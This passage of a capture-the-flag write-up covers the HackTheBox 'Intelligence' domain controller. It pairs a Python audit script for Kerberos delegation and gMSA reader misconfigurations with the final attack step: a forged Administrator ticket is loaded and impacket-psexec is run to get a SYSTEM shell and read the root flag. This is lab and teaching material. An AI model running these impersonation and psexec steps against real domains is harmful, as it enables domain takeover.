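# userAccountControl flag values (MS-ADTS 2.2.16)
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
PROTECTED_USERS_DN = "CN=Protected Users,CN=Users,DC=intelligence,DC=htb"
TIER0_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed sample entries shaped like LDAP search results; the values mirror what the
# write-up found (svc_int$ delegating to WWW/dc.intelligence.htb), they are not a real dump.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc_int$",
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["WWW/dc.intelligence.htb"], "memberOf": []},
    {"sAMAccountName": "DC$",
     "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": [], "memberOf": []},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200,
     "msDS-AllowedToDelegateTo": [],
     "memberOf": ["CN=Domain Admins,CN=Users,DC=intelligence,DC=htb"]},
]
# Principals allowed to read each gMSA password (what gMSADumper printed for svc_int$).
GMSA_READERS = {"svc_int$": ["DC$", "itsupport"]}

def classify_delegation(entry):
    """Return the delegation mode configured on an account."""
    uac = entry["userAccountControl"]
    targets = entry.get("msDS-AllowedToDelegateTo") or []
    if uac & UF_TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if targets and uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
        return "constrained-protocol-transition"
    if targets:
        return "constrained-kerberos-only"
    return "none"

def is_impersonation_protected(entry):
    """True if S4U2self cannot produce a forwardable ticket for this user, so S4U2proxy fails."""
    return bool(entry["userAccountControl"] & UF_NOT_DELEGATED) or \
        PROTECTED_USERS_DN in entry.get("memberOf", [])

def spn_host(spn):
    """'WWW/dc.intelligence.htb:80' -> 'dc.intelligence.htb'"""
    return spn.split("/", 1)[-1].split(":", 1)[0].lower()

def audit(entries, gmsa_readers, dc_hosts=("dc.intelligence.htb",),
          dc_accounts=("DC$",), tier0_users=("Administrator",)):
    """Return (account, severity, message) findings for the delegation chain."""
    findings = []
    for e in entries:
        name, mode = e["sAMAccountName"], classify_delegation(e)
        if mode == "unconstrained":
            sev = "info" if name in dc_accounts else "high"   # DCs are unconstrained by design
            findings.append((name, sev, "unconstrained delegation: caches TGTs of connecting users"))
        elif mode == "constrained-protocol-transition":
            targets = e["msDS-AllowedToDelegateTo"]
            sev = "high" if any(spn_host(t) in dc_hosts for t in targets) else "medium"
            findings.append((name, sev, "protocol transition to " + ", ".join(targets)
                             + ": whoever holds this account's secret can impersonate unprotected users there"))
        if name in tier0_users and not is_impersonation_protected(e):
            findings.append((name, "high", "tier-0 user is delegatable: add to Protected Users or set NOT_DELEGATED"))
    for gmsa, readers in gmsa_readers.items():
        extra = [r for r in readers if r not in dc_accounts and r not in TIER0_GROUPS]
        if extra:
            findings.append((gmsa, "high", "gMSA password readable by non-tier-0 principals: " + ", ".join(extra)))
    return findings

if __name__ == "__main__":
    for account, severity, message in audit(SAMPLE_ENTRIES, GMSA_READERS):
        print(f"[{severity}] {account}: {message}")
```

Either fix on its own breaks the chain shown above: removing itsupport from the gMSA's readers keeps the svc_int$ secret out of reach, and putting Administrator in Protected Users (or setting NOT_DELEGATED) makes the S4U2proxy step fail even with that secret in hand.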
Now that we have the service ticket, we need to make it available so we can authenticate as Administrator. We set it in the KRB5CCNAME environment variable and then use it to access the victim machine as Administrator.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ export KRB5CCNAME=administrator.ccache
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ impacket-psexec -dc-ip dc.intelligence.htb -k "intelligence.htb/Administrator@dc.intelligence.htb" -no-pass
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file WfoFBYFg.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service sGUG on dc.intelligence.htb.....
[*] Starting service sGUG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>cd c:\Users\Administrator\Desktop
c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is E3EF-EBBD
Directory of c:\Users\Administrator\Desktop
04/18/2021 05:51 PM <DIR> .
04/18/2021 05:51 PM <DIR> ..
08/30/2021 03:28 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,924,732,928 bytes free
c:\Users\Administrator\Desktop>type root.txt
38418e********************42bebd
And we got the root flag!
I hope this shows how unconstrained delegation becomes a risk to an environment when the environment is not configured properly. What I mean by this is that even when the delegation itself is done right, if an account is given more rights than it should have and that account gets compromised, an attacker can move laterally by compromising another, more privileged account, and from there the rest of the environment.